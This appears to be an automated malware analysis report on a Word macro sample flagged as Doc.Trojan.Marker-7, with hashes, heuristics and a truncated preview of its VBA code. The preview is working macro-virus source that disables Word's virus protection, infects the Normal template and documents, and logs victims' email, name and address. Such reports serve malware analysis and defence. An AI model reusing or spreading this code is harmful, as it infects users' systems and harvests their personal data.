Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 554f735ff48899f8…

MALICIOUS

Office (OLE)

Size: 43.0 KB
Created: 1997-09-17 11:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: b44d0e44c7b31b2fade8fa5582037c19
SHA-1: f8736c499753150a2e35af055aa07c24f131e70d
SHA-256: 554f735ff48899f8fc7a7b5967fe74dce40847be731e51171b960bb1c4478658
Risk score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Marker-7. It contains VBA macros, which are a common vector for malware. The macro code appears to be obfuscated and attempts to write to a file path 'C:\Scan8328.sys', suggesting it may be part of a downloader or dropper mechanism. The macro's intent is to execute further malicious actions, likely involving the file it writes.

Heuristics (2)

  • ClamAV: Doc.Trojan.Marker-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-7
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 22228 bytes
SHA-256: 0626ea45d5d335c91c60f18ab7293c50718d84e72d9bc48a2341d96f9ba2367e
Detection
ClamAV: Doc.Trojan.Marker-7
Obfuscation or payload: unlikely
Script preview (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()

On Error Resume Next

Const Marcador = "<->"

'Declare variables
Dim SalvarDocumento, SalvarPlantillaNormal, DocumentoInfectado, PlantillaNormalInfectada As Boolean
Dim ad, nt, ad2 As Object
Dim OurCode, UserAddress, LogData, LogFile As String
Dim CorreoPredeterminado, Email, DatosFichero, ExisteFichero As String


'Initialize variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

'So that nothing is visible on screen
Application.ScreenUpdating = False


DocumentoInfectado = ad.codemodule.Find(Marcador, 1, 1, 10000, 10000)
PlantillaNormalInfectada = nt.codemodule.Find(Marcador, 1, 1, 10000, 10000)


'Switch the VirusProtection OFF
Options.VirusProtection = False

If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") <> "kk") Then

    If DocumentoInfectado = True Then
      LogData = ad.codemodule.Lines(1, ad.codemodule.CountOfLines)
    ElseIf PlantillaNormalInfectada = True Then
      LogData = nt.codemodule.Lines(1, nt.codemodule.CountOfLines)
    End If

    LogData = Mid(LogData, InStr(1, LogData, "'Ordenadores " & "Infectados -->") + 29, Len(LogData) - InStr(1, LogData, "'Ordenadores " & "Infectados -->") + 29)

    LogFile = "C:\Scan8328" & ".sys"
    DatosFichero = ""
    For i = 1 To Len(LogData)
        If Mid(LogData, i, 1) <> "'" Then
            DatosFichero = DatosFichero & Mid(LogData, i, 1)
        End If
    Next
    
    Open LogFile For Output As #1
    Print #1, DatosFichero
    Close #1

    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = "kk"

End If

'For safety
If (DocumentoInfectado = True Xor PlantillaNormalInfectada = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
   
   'Infect the Normal template
   If DocumentoInfectado = True Then
  
     SalvarPlantillaNormal = NormalTemplate.Saved
  
     OurCode = ad.codemodule.Lines(1, ad.codemodule.CountOfLines)

    
     'Write the data of the new infection

     CorreoPredeterminado = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager", "Default Mail Account")
     Email = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\" & CorreoPredeterminado, "SMTP Email Address")
     
     For i = 1 To Len(Application.UserAddress)
       If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
         If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
           UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
         End If
       End If
     Next i
     
     
     
     OurCode = OurCode & Chr(13) & _
              "'" & "Hello From;" & Email & ";" & _
              Format(Time, "hh:mm:ss AMPM - ") & _
              Format(Date, "dddd, d mmm yyyy") & ";" & _
              Application.UserName & " | " & UserAddress




     nt.codemodule.DeleteLines 1, nt.codemodule.CountOfLines
     nt.codemodule.AddFromString OurCode
   
     'If SalvarPlantillaNormal = True Then
     '   NormalTemplate.Save
     'End If
     
     If NormalTemplate.Saved = False Then
        NormalTemplate.Save
        PlantillaNormalInfectada = False
     End If
  End If

  'Infect the active document
  If PlantillaNormalInfectada = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
     If ActiveDocument.MailMerge.DataSource.Name <> "C:\scan8328.sys" Then
       SalvarDocumento = ActiveDocument.Saved
    
       OurCode = nt.codemodule.Lines(1, nt.codemodule.CountOfLines)
   
... (truncated)